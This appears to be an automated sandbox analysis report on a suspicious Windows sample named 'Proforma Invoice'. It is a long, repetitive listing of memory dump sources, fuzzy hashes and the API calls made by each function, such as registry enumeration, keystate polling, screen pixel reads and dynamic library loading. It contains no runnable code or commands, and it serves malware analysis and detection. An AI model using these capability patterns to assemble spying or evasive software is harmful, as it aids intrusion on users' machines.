                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                • String ID: nul
                                                                                                • API String ID: 4209266947-2873401336
                                                                                                • Opcode ID: e9f0616c8febb4fcd2da202eb8cb6cd61635e4fb96e4084555e6959073fd5df9
                                                                                                • Instruction ID: bbe164ebb32cab3c14077369ceb22775ab805e1f473d57e944c0d6c6e237049b
                                                                                                • Opcode Fuzzy Hash: e9f0616c8febb4fcd2da202eb8cb6cd61635e4fb96e4084555e6959073fd5df9
                                                                                                • Instruction Fuzzy Hash: 65219079500305DBDB209F69DC14A9A77E8BF45724F204B29FCA0D72D0E774A8618B60
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0070AC54
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0070ACA8
                                                                                                • __swprintf.LIBCMT ref: 0070ACC1
                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0072F910), ref: 0070ACFF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                • String ID: %lu
                                                                                                • API String ID: 3164766367-685833217
                                                                                                • Opcode ID: 0e2c59b014fc41c2625a1da5afd180c861ca558216957d21cb4f5e69bf0bd53c
                                                                                                • Instruction ID: 6da662c823cf8884cdd32508d763704661194f5b7d43ce54acffa02454d1c116
                                                                                                • Opcode Fuzzy Hash: 0e2c59b014fc41c2625a1da5afd180c861ca558216957d21cb4f5e69bf0bd53c
                                                                                                • Instruction Fuzzy Hash: 70219D70A00209EFCB50EF64C945EAFBBB9EF49314B108069F909AB251DA75EE41CB25
                                                                                                APIs
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006FFCED,?,00700D40,?,00008000), ref: 0070115F
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006FFCED,?,00700D40,?,00008000), ref: 00701184
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006FFCED,?,00700D40,?,00008000), ref: 0070118E
                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,006FFCED,?,00700D40,?,00008000), ref: 007011C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                • String ID: @p
                                                                                                • API String ID: 2875609808-1785748387
                                                                                                • Opcode ID: 2b7b431b70d5f01c89073f204c1f427b2f7f6aa2ae0b647fdbbb0419cd0b6895
                                                                                                • Instruction ID: ff816a3e16ce2bebb2f91a6ef7d997893006d1dae4d7e8f2f2de074830e6165e
                                                                                                • Opcode Fuzzy Hash: 2b7b431b70d5f01c89073f204c1f427b2f7f6aa2ae0b647fdbbb0419cd0b6895
                                                                                                • Instruction Fuzzy Hash: 7811A131C0061CE7CF04DFA4D848AEEBFB8FF09711F808165EA40B2280CB789561CB95
                                                                                                APIs
                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00701B19
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharUpper
                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                • API String ID: 3964851224-769500911
                                                                                                • Opcode ID: a2e709c9bd93a43c553908eea02e5737244be290fc237b65cc482c5102c708ef
                                                                                                • Instruction ID: b72313ebd24f84dc9f83002d07d955ffbeaa5814514be267e8b8bca8cb21491e
                                                                                                • Opcode Fuzzy Hash: a2e709c9bd93a43c553908eea02e5737244be290fc237b65cc482c5102c708ef
                                                                                                • Instruction Fuzzy Hash: 13115E70900208CFCF40EF94D8519FEB7B5FF26308B548569D82567292EB365D1ACB54
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0071EC07
                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0071EC37
                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0071ED6A
                                                                                                • CloseHandle.KERNEL32(?), ref: 0071EDEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2364364464-0
                                                                                                • Opcode ID: 78e93738f43be325c070db75ee8c20283544c901272c17efd0e9324c52a2652c
                                                                                                • Instruction ID: db52d7e503d36ebc124f5b0f13199c42508fc8f1e522a3fa097d8e78ec145c5e
                                                                                                • Opcode Fuzzy Hash: 78e93738f43be325c070db75ee8c20283544c901272c17efd0e9324c52a2652c
                                                                                                • Instruction Fuzzy Hash: 7B81A0716003009FD760EF28C886F6AB7E6AF89710F14891DF999DB2D2DA74AC40CF55
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 00720E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0071FDAD,?,?), ref: 00720E31
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007200FD
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072013C
                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00720183
                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 007201AF
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 007201BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 3440857362-0
                                                                                                • Opcode ID: b7148f1462771586871dbfac4e27740c16ef572d11ca75cedb5be127d9f1b6ad
                                                                                                • Instruction ID: 2ecbb7fa6d21d773670d2e09f282f67648faced67dee8dc169edffa10978b489
                                                                                                • Opcode Fuzzy Hash: b7148f1462771586871dbfac4e27740c16ef572d11ca75cedb5be127d9f1b6ad
                                                                                                • Instruction Fuzzy Hash: 50515A31208208AFC714EF64D881E6EB7EAFF84304F40492DF59587292DB35ED15CBA6
                                                                                                APIs
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0071D927
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0071D9AA
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0071D9C6
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0071DA07
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0071DA21
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00707896,?,?,00000000), ref: 006A5A2C
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00707896,?,?,00000000,?,?), ref: 006A5A50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                • String ID:
                                                                                                • API String ID: 327935632-0
                                                                                                • Opcode ID: 0d4282c302f7968180b7eb38957497f0819161b8c7934e7fb834b34c4bcdd5e9
                                                                                                • Instruction ID: 0992b6c29ea002dfc8f5123f91732f97df2e932f51806b0fc72a7115222be8ee
                                                                                                • Opcode Fuzzy Hash: 0d4282c302f7968180b7eb38957497f0819161b8c7934e7fb834b34c4bcdd5e9
                                                                                                • Instruction Fuzzy Hash: A4512635A00209DFCB50EFA8C4849AEB7B5FF09320B54C069E956AB352DB35ED85CF94
                                                                                                APIs
                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0070E61F
                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0070E648
                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0070E687
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0070E6AC
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0070E6B4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1389676194-0
                                                                                                • Opcode ID: 3180bd0406921325db6b5b44d7602b8afff10d0788db7ee28ca7ae166de57ac4
                                                                                                • Instruction ID: f29459b9ef3dee4f415d0ca228312f1a827d823e4e745f0a319bf8956f24a72e
                                                                                                • Opcode Fuzzy Hash: 3180bd0406921325db6b5b44d7602b8afff10d0788db7ee28ca7ae166de57ac4
                                                                                                • Instruction Fuzzy Hash: 6451FA35A00105DFCB41EF64D985AAEBBF6EF0A314B1484A9E809AB361CB35ED11DF64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 129eb23e9e7ca17d46b3e0fd6e52b6ddf76ed867481ecf9f2ec33c57eb1a090c
                                                                                                • Instruction ID: 75a890bcbcd939566b4524eaa13f89e6cb59de99f6a11e150088bcccad9a5fe3
                                                                                                • Opcode Fuzzy Hash: 129eb23e9e7ca17d46b3e0fd6e52b6ddf76ed867481ecf9f2ec33c57eb1a090c
                                                                                                • Instruction Fuzzy Hash: 3041E435904228FFD720DF28EC48FA9BBB8EB09320F144165F916A72E1D778AD61DA51
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 006A2357
                                                                                                • ScreenToClient.USER32(007657B0,?), ref: 006A2374
                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 006A2399
                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 006A23A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                • String ID:
                                                                                                • API String ID: 4210589936-0
                                                                                                • Opcode ID: b67a90527fee8e9ed572333cf271e9e6c41da7677d62fdcc0bf1bbbf1174651c
                                                                                                • Instruction ID: 389952a6e413dc30abfcae7eee40c344783f9ca3a02d798556702d9d8366283b
                                                                                                • Opcode Fuzzy Hash: b67a90527fee8e9ed572333cf271e9e6c41da7677d62fdcc0bf1bbbf1174651c
                                                                                                • Instruction Fuzzy Hash: BF417135A0411AFBCF259F69C844AE9BB76FB06360F20432AF82992390C735AD51DF91
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F63E7
                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 006F6433
                                                                                                • TranslateMessage.USER32(?), ref: 006F645C
                                                                                                • DispatchMessageW.USER32(?), ref: 006F6466
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F6475
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                • String ID:
                                                                                                • API String ID: 2108273632-0
                                                                                                • Opcode ID: c51c6f4611e742f6a632b340722153872f3a3b920b1f622ae74751099ba9202b
                                                                                                • Instruction ID: 07dced3fbd346969f3af6715ae84add0bf6a477bd00f304fc8acd960048f7d7e
                                                                                                • Opcode Fuzzy Hash: c51c6f4611e742f6a632b340722153872f3a3b920b1f622ae74751099ba9202b
                                                                                                • Instruction Fuzzy Hash: 8831C47190065AAFDB64DF70CC45BF67BFAAB01300F148175F622C32A0E7699889E764
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 006F8A30
                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 006F8ADA
                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006F8AE2
                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 006F8AF0
                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006F8AF8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3382505437-0
                                                                                                • Opcode ID: 434a51218c136a28feb94620043bda84a3d56e3d165e9f39f3c8175cac5809d2
                                                                                                • Instruction ID: 37c97df4ab11220a2f120898bdb9050ce96db9845c73be759f681941278f2390
                                                                                                • Opcode Fuzzy Hash: 434a51218c136a28feb94620043bda84a3d56e3d165e9f39f3c8175cac5809d2
                                                                                                • Instruction Fuzzy Hash: 5931D17150021DEFDB14CF68D94CAEE3BB6EB04315F108269FA24E72D0C7B09910CB90
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 006FB204
                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006FB221
                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006FB259
                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006FB27F
                                                                                                • _wcsstr.LIBCMT ref: 006FB289
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                • String ID:
                                                                                                • API String ID: 3902887630-0
                                                                                                • Opcode ID: 4c893cd89dac965dc004fc8ce37aa141812e84702dddcecdf1011dede7e805b5
                                                                                                • Instruction ID: a26b9af789b19fab6a7191f6ef7610dfa8be94a61e7d1e0e911c936df7545237
                                                                                                • Opcode Fuzzy Hash: 4c893cd89dac965dc004fc8ce37aa141812e84702dddcecdf1011dede7e805b5
                                                                                                • Instruction Fuzzy Hash: EC213731204204BBEB259B35DC09EBF7BAEDF49710F00803DF904CA261EF65DD419664
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0072B192
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0072B1B7
                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0072B1CF
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0072B1F8
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00710E90,00000000), ref: 0072B216
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2294984445-0
                                                                                                • Opcode ID: c2b27dbdb94c9f90d966b889d9f807a3e16c90eaa697191623040573b08c2373
                                                                                                • Instruction ID: f0508d6de0d3b7ae277c72d461cc6d619ee228702129ec7ce88cf20c2368a2e1
                                                                                                • Opcode Fuzzy Hash: c2b27dbdb94c9f90d966b889d9f807a3e16c90eaa697191623040573b08c2373
                                                                                                • Instruction Fuzzy Hash: 28219171910666EFCB209F38AC14A6A37A4FB15721F108738F932D71E0D73898619B90
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006F9320
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006F9352
                                                                                                • __itow.LIBCMT ref: 006F936A
                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006F9392
                                                                                                • __itow.LIBCMT ref: 006F93A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2983881199-0
                                                                                                • Opcode ID: 836b599cee26719e16896ab5bf0b381b5df27f83cbdf603693a4160ab5365fc9
                                                                                                • Instruction ID: a9a278a6131634e394bd5d9acea4ac48634a0672554e9f97d2bdb7d1427e75b7
                                                                                                • Opcode Fuzzy Hash: 836b599cee26719e16896ab5bf0b381b5df27f83cbdf603693a4160ab5365fc9
                                                                                                • Instruction Fuzzy Hash: 6621C53270021CABDB10AA649C85FFE7BABEB49711F048029FA45D72D1D6B09D4587A5
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 00715A6E
                                                                                                • GetForegroundWindow.USER32 ref: 00715A85
                                                                                                • GetDC.USER32(00000000), ref: 00715AC1
                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00715ACD
                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00715B08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
